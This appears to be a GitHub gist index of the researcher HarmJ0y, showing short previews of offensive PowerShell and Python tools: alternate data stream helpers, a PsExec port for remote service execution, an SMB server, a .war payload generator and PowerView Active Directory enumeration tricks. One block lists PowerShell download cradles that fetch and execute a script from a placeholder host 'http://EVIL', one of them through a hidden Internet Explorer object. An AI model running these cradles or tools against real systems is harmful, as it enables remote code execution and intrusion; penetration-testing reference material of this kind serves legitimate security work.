HarmJ0y

# these functions all you to enumerate, add, and remove alternate data streams
# it can function as a bootleg replacement for Sysinternals' streams.exe

function Find-Streams {
    <#
    .SYNOPSIS
    Enumerates all alternate data streams for a specified path.
    If no path is provided, the current path is used.
    Author: @harmj0y
    License: BSD 3-Clause

HarmJ0y

### Keybase proof

I hereby claim:

  * I am harmj0y on github.
  * I am harmj0y (https://keybase.io/harmj0y) on keybase.
  * I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4  383A FA2F 9AA5 3110 89D3

To claim this, I am signing this object:

HarmJ0y

Function Invoke-LockWorkStation {
    # region define P/Invoke types dynamically
    #   stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
    #   thanks matt and chris :)
    $DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
 
    $TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
    $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))

HarmJ0y

function Invoke-LockWorkStation {
    # region define P/Invoke types dynamically
    #   stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
    #   thanks matt and chris :)
    $DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
 
    $TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
    $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))

HarmJ0y

#!/usr/bin/python

from impacket import smbserver
import sys, argparse, threading, ConfigParser, time, os


class ThreadedSMBServer(threading.Thread):
    """
    Threaded SMB server that can be spun up locally.
    """

HarmJ0y

function Invoke-PsExec {
    <#
    .SYNOPSIS
    This function is a rough port of Metasploit's psexec functionality.
    It utilizes Windows API calls to open up the service manager on
    a remote machine, creates/run a service with an associated binary
    path or command, and then cleans everything up.

    Either a -Command or a custom -ServiceEXE can be specified.
    For -Commands, a -ResultsFile can also be specified to retrieve the

HarmJ0y

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

HarmJ0y

#!/usr/bin/python

# Code that quickly generates a deployable .war for a PowerShell one-liner

import zipfile
import StringIO
import sys

def generatePsWar(psCmd, appName):

HarmJ0y

function Translate-Canonical {
    <#
    .SYNOPSIS
    Converts a user@fqdn to NT4 format.
    .LINK
    http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
    #>
    [CmdletBinding()]
    param(
        [String]$User

HarmJ0y

# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server